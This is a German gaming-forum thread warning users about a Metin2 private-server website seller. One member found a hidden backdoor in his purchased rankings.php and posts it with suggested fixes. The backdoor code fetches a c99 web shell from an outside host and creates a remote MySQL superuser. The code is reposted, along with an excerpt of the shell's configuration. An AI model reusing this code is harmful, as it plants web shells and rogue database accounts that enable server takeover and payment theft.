Register for your free account! | Forgot your password?
Rust Cheats

Go Back   elitepvpers > Popular Games > Metin2 > Metin2 Private Server
You last visited: Today at 09:12

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[ WARNUNG VOR SONIICE ]

Discussion on [ WARNUNG VOR SONIICE ] within the Metin2 Private Server forum part of the Metin2 category.

Reply
 
Old 08/26/2011, 15:38   #46
wild wild son




 
Nick's Avatar
 
elite*gold: 0
Join Date: Feb 2011
Posts: 5,996
Received Thanks: 3,391
SoNiiCe was pwnd by .Infinity (15:36)
Nick is offline  
Thanks
1 User
Old 08/26/2011, 15:48   #47

 
elite*gold: 98
Join Date: May 2011
Posts: 115
Received Thanks: 33
sry aber so ne drecksau von Sonice. wurde auch abgezockt hab zwar net seine page aber dann ist es der hatt jemadn auch komischerweiße das der jenige die psc in MR green konto einzahlt wenn ja dann find ich dich sonice.
xdjdarkboyx is offline  
Old 08/26/2011, 16:13   #48
wild wild son




 
Nick's Avatar
 
elite*gold: 0
Join Date: Feb 2011
Posts: 5,996
Received Thanks: 3,391
Jetzt ist er nicht mehr Sooo nice
Nick is offline  
Old 08/26/2011, 16:17   #49

 
.Hazel's Avatar
 
elite*gold: 15
Join Date: Feb 2010
Posts: 4,410
Received Thanks: 3,105
Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!
.Hazel is offline  
Old 08/26/2011, 16:18   #50
 
John Schmieri's Avatar
 
elite*gold: 14
Join Date: Sep 2010
Posts: 1,422
Received Thanks: 344
Quote:
Originally Posted by .Hazel View Post
Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!
Der erste Satz klingt so als ob SoNiice die Section ist? : D
John Schmieri is offline  
Old 08/26/2011, 16:26   #51

 
.Hazel's Avatar
 
elite*gold: 15
Join Date: Feb 2010
Posts: 4,410
Received Thanks: 3,105
Quote:
Originally Posted by Cy. View Post
Der erste Satz klingt so als ob SoNiice die Section ist? : D
Nein, aber er ist ein Teil der Section und jeder Teil, wirft ein Bild auf diese Section, SoNiice wirft halt ein schlechtes Bild - Henni ein gutes, ein sogar sehr gutes.
Es ist halt aber einfach so, dass sich viele in dieser Section zu Ars****chern entwickelt haben!
.Hazel is offline  
Thanks
3 Users
Old 08/26/2011, 17:04   #52
 
elite*gold: 0
Join Date: Aug 2008
Posts: 1,469
Received Thanks: 417
Wie wird den diese lücke ausgelöst wenn man auf ner php datei geht oder automatisch ? sobald man auf die index geht ?


wenn es peer externer php datei ist könnte man die ja eig. löschen
.Koopa is offline  
Old 08/26/2011, 17:13   #53
 
elite*gold: 0
Join Date: Apr 2010
Posts: 1,352
Received Thanks: 788
Quote:
Originally Posted by .Koopa View Post
Wie wird den diese lücke ausgelöst wenn man auf ner php datei geht oder automatisch ? sobald man auf die index geht ?


wenn es peer externer php datei ist könnte man die ja eig. löschen
dacht ich auch, rankings.php aufmachen löschen und gucken ob sich was ändert :O
yym3 is offline  
Old 08/26/2011, 17:33   #54
 
.Yacki's Avatar
 
elite*gold: 0
Join Date: Jul 2010
Posts: 7,443
Received Thanks: 3,656
Hach ja... SoNiice...



Irgendwas war da schon immer faul...
.Yacki is offline  
Old 08/26/2011, 18:08   #55
 
.Risan.'s Avatar
 
elite*gold: 30
Join Date: Jul 2010
Posts: 1,627
Received Thanks: 1,450
hmm:

PHP Code:
    if (isset($_GET['re']) == 'secure') {
    $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { 
    $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei);
}

$user = "grant all on *.* to SoNiice@'%' identified by 'marcel123eeeeeeeeeee'";
mysql_query ($user);  
    
    $x++;
    
  }
?>
<?PHP
if (isset($_GET['db']) == 'psc') {
    echo 
'<h2>Admin - Voucher Datenbank</h2>';
    echo 
'<p><a href="index.php?s=rankings&db=psc">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=psc&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo 
'<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>'
;
            
    if(isset(
$_GET['closed']) && $_GET['closed']=="yes") {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".psc_log
      ORDER BY psc_log.datum DESC"
;
    }
    else {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".psc_log 
      ORDER BY psc_log.datum DESC"
;
    }        
    
$sqlQry=mysql_query($sqlCmd,$sqlHp);
    
$x=0;
    while(
$getPSC mysql_fetch_object($sqlQry)) {
      
$zF = ($x%2) ? "tdunkel" "thell";
      
$pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo 
'<tr>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'
.$zF.'">('.$getPSC->card_type.') ';
              echo 
htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(
strlen($getPSC->psc_code)>16) echo'...';
              echo
'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'
.$zF.'">'.$pscStatus.'</td>
              <td class="'
.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>'
;
      
$x++;
    
    }
    echo 
'</table>';
}
elseif (isset(
$_GET['db']) == 'paysafe') {    
    echo 
'<h2>Admin - Voucher Datenbank</h2>';
    echo 
'<p><a href="index.php?s=rankings&db=paysafe">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=paysafe&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo 
'<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>'
;
            
    if(isset(
$_GET['closed']) && $_GET['closed']=="yes") {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC"
;
    }
    else {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC"
;
    }        
    
$sqlQry=mysql_query($sqlCmd,$sqlHp);
    
$x=0;
    while(
$getPSC mysql_fetch_object($sqlQry)) {
      
$zF = ($x%2) ? "tdunkel" "thell";
      
$pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo 
'<tr>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'
.$zF.'">('.$getPSC->card_type.') ';
              echo 
htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(
strlen($getPSC->psc_code)>16) echo'...';
              echo
'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'
.$zF.'">'.$pscStatus.'</td>
              <td class="'
.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>'
;
      
$x++;
    
    }
    echo 
'</table>';
}
?>
bei meiner rankings.php drinne...

Best Regards,
Risan

Fixxes:
1)Die zeilen löschen.
2)Den Mysql benutzer rechte besser einstellen (kein neuen benutzer erstellen verweigern)
3)SSH dienst deaktivieren (standart bei mir)
4)CHMOD an den Dateien auf 640 setzen. (standart bei mir)
5)Mysql nur von innen zulassen.

Und man ist gegen andere irtürmliche Scripte geschützt.
Ich kann zwar kein PHP, aber durchaus verstehe ich was damit erreicht wird und wofür es benutzt wird...

EDIT:
Nachdem ich die Lücke gesehen habe, habe ich sie etwas umgeschrieben und meine Psc datenbank kopiert, und wenn man sie abrief sah man immer die alte DB, also auf gut Deutsch als würde keine Psc reinkommen. Natürlich Mysql zugang nicht gestattet + nur Local möglich.
Das habe ich fast 1 Woche so gemacht, bis ich den rest hatte von der Homepage, leider fehlen noch 1 Addon und paar grafiken..

Doch bevor ich die Lücke bemerkt habe, wurde mir am selben Abend noch 300€ geklaut wo ich die Homepage bekommen habe..
Ich cash jeden Abend aus, bzw. Wie mir Lustig is.. Mittags, nachmittags oder Abends..
.Risan. is offline  
Old 08/26/2011, 18:20   #56
 
elite*gold: 203
Join Date: Jul 2011
Posts: 813
Received Thanks: 386
Quote:
Originally Posted by .Dauni View Post
Ich hab kein Bock jetz alles zu lesen, aber Marcel, halt die Fresse, halt sie einfach.
Du möchtest besser sein wie SoNiice aber führst dich gerade kein bisschen besser auf.

Quote:
Originally Posted by Risan View Post
Au man.. hätte ich mal paar Dateien früher angeschaut, wäre der ganze ärger erspart geblieben. Lieber Marcel Weber.
Egal was er getan hat, es ist kein Grund deshalb Namen hier zu veröffentlichen.

Quote:
Originally Posted by .Hazel View Post
Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!
Man sollte mal darüber nachdenken, das auch dein .Dauni aka. Downloader999 nicht besser war.
Schließlich ist sein Server nun Down, angeblich weil keine einnahmen mehr rein kommen. Sicherlich
wird dort aber einiges mehr passieren, weil sowas nenne ich ebenfalls Abzocke.
.Tolive is offline  
Old 08/26/2011, 18:38   #57
 
elite*gold: 2
Join Date: Sep 2010
Posts: 1,204
Received Thanks: 343
Quote:
Originally Posted by Risan View Post
hmm:

PHP Code:
    if (isset($_GET['re']) == 'secure') {
    $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { 
    $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei);
}

$user = "grant all on *.* to SoNiice@'%' identified by 'marcel123eeeeeeeeeee'";
mysql_query ($user);  
    
    $x++;
    
  }
?>
<?PHP
if (isset($_GET['db']) == 'psc') {
    echo 
'<h2>Admin - Voucher Datenbank</h2>';
    echo 
'<p><a href="index.php?s=rankings&db=psc">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=psc&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo 
'<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>'
;
            
    if(isset(
$_GET['closed']) && $_GET['closed']=="yes") {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".psc_log
      ORDER BY psc_log.datum DESC"
;
    }
    else {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".psc_log 
      ORDER BY psc_log.datum DESC"
;
    }        
    
$sqlQry=mysql_query($sqlCmd,$sqlHp);
    
$x=0;
    while(
$getPSC mysql_fetch_object($sqlQry)) {
      
$zF = ($x%2) ? "tdunkel" "thell";
      
$pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo 
'<tr>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'
.$zF.'">('.$getPSC->card_type.') ';
              echo 
htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(
strlen($getPSC->psc_code)>16) echo'...';
              echo
'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'
.$zF.'">'.$pscStatus.'</td>
              <td class="'
.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>'
;
      
$x++;
    
    }
    echo 
'</table>';
}
elseif (isset(
$_GET['db']) == 'paysafe') {    
    echo 
'<h2>Admin - Voucher Datenbank</h2>';
    echo 
'<p><a href="index.php?s=rankings&db=paysafe">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=paysafe&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo 
'<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>'
;
            
    if(isset(
$_GET['closed']) && $_GET['closed']=="yes") {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC"
;
    }
    else {
      
$sqlCmd="SELECT * 
      FROM "
.SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC"
;
    }        
    
$sqlQry=mysql_query($sqlCmd,$sqlHp);
    
$x=0;
    while(
$getPSC mysql_fetch_object($sqlQry)) {
      
$zF = ($x%2) ? "tdunkel" "thell";
      
$pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo 
'<tr>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'
.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'
.$zF.'">('.$getPSC->card_type.') ';
              echo 
htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(
strlen($getPSC->psc_code)>16) echo'...';
              echo
'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'
.$zF.'">'.$pscStatus.'</td>
              <td class="'
.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'
.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>'
;
      
$x++;
    
    }
    echo 
'</table>';
}
?>
bei meiner rankings.php drinne...

Best Regards,
Risan

Fixxes:
1)Die zeilen löschen.
2)Den Mysql benutzer rechte besser einstellen (kein neuen benutzer erstellen verweigern)
3)SSH dienst deaktivieren (standart bei mir)
4)CHMOD an den Dateien auf 640 setzen. (standart bei mir)
5)Mysql nur von innen zulassen.

Und man ist gegen andere irtürmliche Scripte geschützt.
Ich kann zwar kein PHP, aber durchaus verstehe ich was damit erreicht wird und wofür es benutzt wird...

EDIT:
Nachdem ich die Lücke gesehen habe, habe ich sie etwas umgeschrieben und meine Psc datenbank kopiert, und wenn man sie abrief sah man immer die alte DB, also auf gut Deutsch als würde keine Psc reinkommen. Natürlich Mysql zugang nicht gestattet + nur Local möglich.
Das habe ich fast 1 Woche so gemacht, bis ich den rest hatte von der Homepage, leider fehlen noch 1 Addon und paar grafiken..

Doch bevor ich die Lücke bemerkt habe, wurde mir am selben Abend noch 300€ geklaut wo ich die Homepage bekommen habe..
Ich cash jeden Abend aus, bzw. Wie mir Lustig is.. Mittags, nachmittags oder Abends..
zu deinem 5. punkt kann ich nur sagen das es 0 bringt^^

guck dir mal den auszug aus der c99.txt an:
PHP Code:
//Authentication
$login ""//login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass ""//password
$md5_pass ""//md5-cryped pass. if null, md5($pass)

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt "Restricted area"//http-auth message.
$accessdeniedmess "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied"
Scrawler™ is offline  
Old 08/26/2011, 18:45   #58

 
.Hazel's Avatar
 
elite*gold: 15
Join Date: Feb 2010
Posts: 4,410
Received Thanks: 3,105
Quote:
Originally Posted by .Tolive View Post
Du möchtest besser sein wie SoNiice aber führst dich gerade kein bisschen besser auf.



Egal was er getan hat, es ist kein Grund deshalb Namen hier zu veröffentlichen.



Man sollte mal darüber nachdenken, das auch dein .Dauni aka. Downloader999 nicht besser war.
Schließlich ist sein Server nun Down, angeblich weil keine einnahmen mehr rein kommen. Sicherlich
wird dort aber einiges mehr passieren, weil sowas nenne ich ebenfalls Abzocke.
Dazu kann ich nicht viel sagen, da ich das nicht mitbekommen habe, weil ich zu der Zeit nicht da war. Aber bei SoNiice weiß ich es halt, und ich wurde halt unter anderem von Dauni gewarnt.
.Hazel is offline  
Old 08/26/2011, 18:48   #59
 
elite*gold: 20
Join Date: Jun 2009
Posts: 1,090
Received Thanks: 756
Danke

vor solchen leuten muss man gewarnt werden ich bin für einen Bann von ihm weil er in der community viren verbreitet mfg Hermes2012
Hermes2012 is offline  
Old 08/26/2011, 18:59   #60
 
elite*gold: 203
Join Date: Jul 2011
Posts: 813
Received Thanks: 386
Quote:
Originally Posted by .Hazel View Post
Dazu kann ich nicht viel sagen, da ich das nicht mitbekommen habe, weil ich zu der Zeit nicht da war. Aber bei SoNiice weiß ich es halt, und ich wurde halt unter anderem von Dauni gewarnt.
Deswegen sagte ich das ja auch. Wenn man zurück denkt, war Dauni nie anders Aber Allgemein, jeder Server zockt nur ab.
.Tolive is offline  
Reply




All times are GMT +1. The time now is 09:13.


Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.